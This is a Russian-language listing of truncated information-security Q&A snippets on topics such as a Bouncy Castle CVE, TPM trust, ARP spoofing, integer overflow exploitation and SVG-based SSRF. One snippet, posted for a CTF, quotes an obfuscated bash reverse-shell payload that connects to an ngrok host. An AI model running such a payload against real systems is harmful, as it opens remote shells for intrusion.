Информационная безопасность
как проверить использование метода класса в открытом исходном коде
00
Вопрос или проблема Я обнаружил в коде использование библиотеки Bouncy Castle, уязвимой к CVE CVE-2023-33201. Эта уязвимость, похоже, связана с классом X509LDAPCertStoreSpi.java, и конкретно с методом search(). В проверяемом мною коде нет прямого использования этого класса или метода.
Информационная безопасность
Относительная безопасность пароля ssh и публичного ключа для удалённых систем
00
Вопрос или проблема Я просто знаю, что все будут кричать на меня, что публичный ключ лучше, но позвольте мне сначала изложить реальный сценарий. У меня есть небольшая локальная сеть дома, в основном я единственный регулярный пользователь, но другие члены
Информационная безопасность
Лучшие практики управления управляемыми и частными учетными записями Microsoft/Apple
00
Вопрос или проблема В профессиональном контексте пользователи в идеале должны иметь предоставленные компанией компьютеры, предоставленные компанией смартфоны (если это необходимо) и управляемые учетные записи Microsoft/Apple. Тогда все будет в порядке
Информационная безопасность
как проверить использования виновного класса в открытом исходном коде
00
Вопрос или проблема Я обнаружил в коде использование библиотеки bouncy castle, которая уязвима по CVE CVE-2023-33201. Эта уязвимость, похоже, исходит от класса X509LDAPCertStoreSpi.java, и в частности от метода search(). В коде, который я тестирую, нет
Информационная безопасность
обоснование методики самообследования целостности FIPS 140-3 до начала эксплуатации
00
Вопрос или проблема FIPS 140-3 10.2.A Техника самоиспытания целостности перед эксплуатацией вводит новые требования. Ранее, в FIPS 140-2, проводилось самоиспытание при включении для того, чтобы можно было использовать определённую часть криптографического модуля (например, RSA).
Информационная безопасность
Как узнать, что мой TPM не был подвергнут вмешательству перед его использованием? [дубликат]
00
Вопрос или проблема На этот вопрос уже есть ответы здесь: Что делает TPM “доверенным”? (2 ответа) Что может помешать плохому BIOS обмануть TPM? (1 ответ) Закрыто 22 минуты назад. Я немного исследовал вопрос TPM и вижу его так: он надежно хранит
Информационная безопасность
Существует ли более удобный, но безопасный способ запускать DOSBox-X, чем тот, которым я сейчас пользуюсь?
00
Вопрос или проблема Недавно я узнал о DOSBox-X. Это, по сути, несколько менее ужасная версия в основном заброшенного DOSBox. Сейчас он у меня установлен внутри виртуальной машины Windows 10 на моем ПК с Windows 10. Это единственный компьютер, который у меня есть.
Информационная безопасность
Секреты клиента API записываются в открытом виде (журналы PowerShell)
00
Вопрос или проблема В настоящее время я реализую скрипт PowerShell для вызова API Sophos (https://developer.sophos.com/intro). Write-Output "`nВведите ключ API Sophos / клиентский секрет." $ClientSecret = Read-Host -AsSecureString $Ptr = [System.
Информационная безопасность
Как работает FTP Bounce
00
Вопрос или проблема В настоящее время я занимаюсь проектом по FTP-отскакиванию, и после ознакомления с материалами я по-прежнему не совсем понимаю, как это работает/может работать. Буду признателен, если смогу получить разъяснения от экспертов здесь.
Информационная безопасность
Airmon-ng/Airodump-ng – Низкое количество маяков в некоторых сетях
00
Вопрос или проблема Прошло несколько лет с тех пор, как я играл с этим, так что не уверен, изменились ли времена. При использовании чипсета AR7921 (Alfa AWUS036NHA) на Ubuntu 20.04 я могу увидеть множество сетей, используя следующие команды airodump-ng
Информационная безопасность
В чем основное различие между jar-файлами bcprov и bc-fips (bouncycastle)?
00
Вопрос или проблема Мне трудно понять различия между jar-файлами bc-prov и bc-fips. Я понимаю, что bc-fips содержит подмножество пакетов bc-prov. Но я хочу больше узнать о следующих вопросах: Будет ли какое-либо влияние на производительность при обновлении
Информационная безопасность
Изменение шлюза IPv4 при отравлении DNS в результате успешного спуфинга ARP
00
Вопрос или проблема В последнее время я тестировал свою беспроводную сеть на наличие общих атак, одной из которых является arp-спуфинг, а также атаки, вытекающие из успешного arp-спуфинга, такие как dns-поиск с подменой. (Я использую bettercap) На всех
Информационная безопасность
Пейлоад обратной оболочки не работает
00
Вопрос или проблема $(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27') -i: -c: строка 1: неожиданное EOF при поиске соответствующей `'' Я пытался получить обратный шелл таким образом для CTF
Информационная безопасность
Соединение с ловушками через RDP представляет риск для подключаемого компьютера?
00
Вопрос или проблема Поскольку VPS, на котором я установил t-pot, не имеет графических карт (GPU), я должен подключаться к honeypot через RDP. Я подключаюсь к honeypot t-pot напрямую со своего основного компьютера. Существуют ли риски для моего основного компьютера из-за этого?
Информационная безопасность
Уязвимость переполнения целого числа
00
Вопрос или проблема Я нашел этот интересный вопрос: может ли уязвимость переполнения целого числа быть использована в атаке? Как мне на практике найти следующую инструкцию (в gdb), чтобы я мог перезаписать адрес возврата и выполнить оболочный код?
Информационная безопасность
польза от чтения чувствительных частей файлов через “посредника” оболочки скрипта?
00
Вопрос или проблема tldr: Использование скрипта, запущенного из моего основного процесса, который читает только часть чувствительного файла, а затем передает результат в мой основной процесс – будет ли это иметь какую-либо пользу?
Информационная безопасность
Ключ мастер-шифрования (KMS) против распределенных множественных ключей шифрования (KMS)
00
Вопрос или проблема У меня есть проблема. Я являюсь промежуточным звеном сообщений и хочу приоритизировать конфиденциальность пользователей настолько, насколько это возможно. К сожалению, есть одна проблема. Я не могу разработать свою систему для реализации
Информационная безопасность
Как восстановить данные с SSD-диска WD, который был случайно отформатирован
00
Вопрос или проблема Я случайно отформатировал Windows-машину на своем SSD-диске Western Digital. Я прервал процесс всего через несколько секунд, но после этого диск выдает ошибку. У тома нет поддерживаемой файловой системы и всегда запрашивает форматирование перед продолжением.
Информационная безопасность
Как биометрический вход защищен от утечек безопасности?
00
Вопрос или проблема Если база данных с паролями утечет, пользователь просто может создать другой пароль. Сегодня биометрические проверки безопасности, такие как сканеры отпечатков пальцев и распознавание лиц, часто продвигаются как хорошие меры безопасности
Информационная безопасность
Как эксплуатировать SSRF на основе xlink в SVG
00
Вопрос или проблема Сначала позвольте мне кратко изложить, как работает SSRF: 1) Вы настраиваете изображение SVG с ссылкой на ваш сервер через xlink. Вот пример, который работает: <?xml version=”1.0″ encoding=”